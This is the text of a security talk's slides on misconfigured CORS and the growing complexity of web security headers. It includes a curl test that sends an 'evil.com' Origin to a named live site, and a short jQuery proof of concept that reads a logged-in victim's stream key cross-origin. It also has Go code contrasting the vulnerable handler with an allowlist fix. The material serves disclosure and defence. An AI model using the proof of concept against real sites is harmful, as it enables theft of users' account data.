Misconfigured CORS
Evan Johnson
Why being secure isn’t getting easier
About Me
My name is Evan. I'm a software engineer. I work on security at Cloudflare. I love golang.
How would you secure the internet?
The internet is not a series of castles
Same-Origin Policy
Cross Origin Resource Sharing
CORS is driven by the Origin header
Based on the Origin header, the server is supposed to make decisions about which CORS headers to send back.
Access-Control-Allow-Origin: * is not the same as reflecting the Origin header. * means no cookies.
Cross Origin Resource Sharing Appropriately
Reflecting all Origin headers as Access-Control-Allow-Origin WITH Access-Control-Allow-Credentials: true would be really bad.
Does anyone do this?
Why?
It basically turns off Same-Origin policy…
Which is like ... one of the worst security problems to have.
Cross Origin Resource Sharing Problem
Testing for Bad CORS
Testing for bad CORS
➜ ~ curl https://streamable.com -H "Origin: https://evil.com" -I
HTTP/1.1 200 OK
Date: Tue, 27 Sep 2016 03:39:01 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 34969
Connection: keep-alive
Server: nginx
Vary: Accept-Encoding
Set-Cookie: session=D2V05A0PVBFAXGCW7NJFGCPF; Domain=.streamable.com; Expires=Sat, 13-Feb-2044 03:39:01 GMT; Path=/
Access-Control-Allow-Origin: https://evil.com
Access-Control-Allow-Credentials: true
Exploit Proof of Concept
// Cross-origin request sent with the victim's cookies; the reflected
// Origin plus Allow-Credentials: true lets the page read the response.
$.ajax({
  url: "https://streamable.com/ajax/me",
  success: function(data) {
    document.write("Your stream key is " + data['stream_key']);
  },
  xhrFields: { withCredentials: true }
});
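The misconfiguration the curl test looks for, as an added Go example (not code from the talk or from the badcors-massscan repo): one handler reflects any Origin together with Allow-Credentials: true, the other only echoes an exact allowlist match, and a helper performs the same check the curl command does by eye. The origins and the allowlist are constructed.

```go
package main

import (
	"fmt"
	"net/http"
	"net/http/httptest"
)

// allowedOrigins is a constructed allowlist: only origins listed here may make
// credentialed cross-origin requests.
var allowedOrigins = map[string]bool{
	"https://app.example.com": true,
}

// reflectingCORS reproduces the misconfiguration: it echoes whatever Origin
// arrives and also allows credentials, which effectively disables same-origin policy.
func reflectingCORS(w http.ResponseWriter, r *http.Request) {
	if origin := r.Header.Get("Origin"); origin != "" {
		w.Header().Set("Access-Control-Allow-Origin", origin)
		w.Header().Set("Access-Control-Allow-Credentials", "true")
	}
	w.WriteHeader(http.StatusOK)
}

// allowlistCORS is the fix: only an exact allowlist match is echoed back, and
// unknown origins get no CORS headers at all. Vary: Origin keeps caches honest.
func allowlistCORS(w http.ResponseWriter, r *http.Request) {
	origin := r.Header.Get("Origin")
	if allowedOrigins[origin] {
		w.Header().Set("Access-Control-Allow-Origin", origin)
		w.Header().Set("Access-Control-Allow-Credentials", "true")
		w.Header().Add("Vary", "Origin")
	}
	w.WriteHeader(http.StatusOK)
}

// reflectsWithCredentials sends a request carrying the given Origin and reports
// whether the handler echoed it with Allow-Credentials: true. For an arbitrary,
// attacker-chosen origin, true means the handler is misconfigured.
func reflectsWithCredentials(h http.HandlerFunc, origin string) bool {
	req := httptest.NewRequest(http.MethodGet, "https://victim.example/", nil)
	req.Header.Set("Origin", origin)
	rec := httptest.NewRecorder()
	h(rec, req)
	return rec.Header().Get("Access-Control-Allow-Origin") == origin &&
		rec.Header().Get("Access-Control-Allow-Credentials") == "true"
}

func main() {
	fmt.Println("reflecting handler bad:", reflectsWithCredentials(reflectingCORS, "https://evil.example"))
	fmt.Println("allowlist handler bad:", reflectsWithCredentials(allowlistCORS, "https://evil.example"))
}
```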
How widespread is this problem?
How do I know?
I scanned the Alexa 1M for websites that:
●Access-Control-Allow-Origin: <myevilsite.com>
●Access-Control-Allow-Credentials: true
●I followed redirects
●I checked both http and https
1,514 sites with this problem config
The code - https://github.com/ejcx/badcors-massscan
●Written in go
●Heavy use of concurrency patterns
●Making it public after this talk, and making the results and all the sites public.
What do you do when you find a thousand vulnerable websites?
Started tracking these misconfigurations at their source
●I started looking for the libraries that people were using to cause this behavior.
●I reported this to:
○SAILS JS
○Rack CORS
○(some go library rs/cors.go or something)
○More to come.
CORS, the source
So... what's this about?
Complexity
Complexity in CORS
Cross origin resource sharing could be way easier.
● The authors clearly wanted to prevent people from this type of behavior.
●That's why "*" together with "Allow-Credentials: true" is not allowed.
●Why make it possible at all?
●Why do you need 6 different response headers?
●Reminds me of OpenSSL
CORS is not alone...
●CSP
●SRI
●HPKP
●Credential management
●HSTS
Content Security Policy
●A new "hot" http response header
●CSP is still a mess. Has 3 headers.
●It is growing in complexity BY THE GOSH DARN DAY
Content Security Policy
Sub-Resource Integrity
●Load only expected assets. SRI dictates that you can only load sub-resources that match a hash that is baked into the DOM.
●This is nice, but SRI is confusing. Who should use SRI? When is it not necessary? The spec is not clear.
HTTP Public Key Pinning
●There are probably a baker's dozen of websites where this is useful
●Securityheaders.io tries to make you want to turn on HPKP
●Huge operational burden
●Disaster.
●Complex.
HPKP
Credential Management
●In your browser NOW! Be afraid
●Allows websites to log you in using the browser password manager
HTTP Strict Transport Security
●Very normal header to set nowadays.
●It is not easy. Beware of "includeSubdomains"
●https://twitter.com/bcrypt/status/781969754806366208
What about usable security?
Who remembers OpenSSL? Anyone? Anyone?
Why not go the way of TLS1.3
It should be easy to make a castle, so where do we go from here?
Demand simplicity
●Web specifications are hard. Why are they not easy?
●Cross Origin Resource Sharing needs a full rewrite.
●There are three different Content Security Policy headers....
●Some browsers still don't support it.
●Some browsers still don't support SRI.
WHAT A MESS! Web Specs should be easy!
Come help us save the web
This stuff is all too hard.